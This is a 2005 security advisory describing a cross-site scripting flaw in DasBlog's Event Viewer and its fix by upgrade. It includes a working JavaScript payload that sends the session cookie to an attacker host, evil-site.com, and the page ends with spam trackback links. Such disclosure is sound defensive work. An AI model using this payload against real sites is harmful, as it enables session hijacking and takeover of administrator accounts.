Cross-Site Scripting Vulnerability in Newtelligence DasBlog Community Edition

Author:
Dominick Baier <dbaier@ernw.de>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog's Event Viewer allows to inject and execute code on the client's machine. This allows an attacker to transfer the ASP.NET authentication cookie to a server of his choice. The attacker can use this cookie to log on to DasBlog and modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
 All

Browsers
 Tested with IE 6 and Firefox 1.0

4. Patch Availability

5. Details

The Events Viewer show details about failed requests that were made to the blog site. As extra information the requests details, e.g. the ViewState, is shown. It is possible to specially malform parts of the request to inject scripting code. This code gets embedded in the HTML pages and executed on the client. With specially crafted JavaScript code a attacker can transfer the ASP.NET Forms Authentication Cookie to a server of the his choice. While injecting this cookie in a HTTP request to DasBlog he can authenticate without having to know the username or the password and enter the administrative area.

Examples of script injections

Embed script code in the ViewState and send it to dasBlog

Example of transferring a cookie using JavaScript

<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie='+document.cookie</script>

6. Solution
Install the latest Version (which is by the time of writing 1.7.5016.2)

7. Disclaimer
 
The informations in this advisory are provided "AS IS" without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

Sunday, March 06, 2005 8:27:19 AM UTC     Tracked by:
"diet pills online" (diet pills online) [Trackback]
"free party poker online" (free party poker online) [Trackback]
"texas hold em" (texas hold em) [Trackback]
"poker rules" (poker rules) [Trackback]
"bad credit loans" (bad credit loans) [Trackback]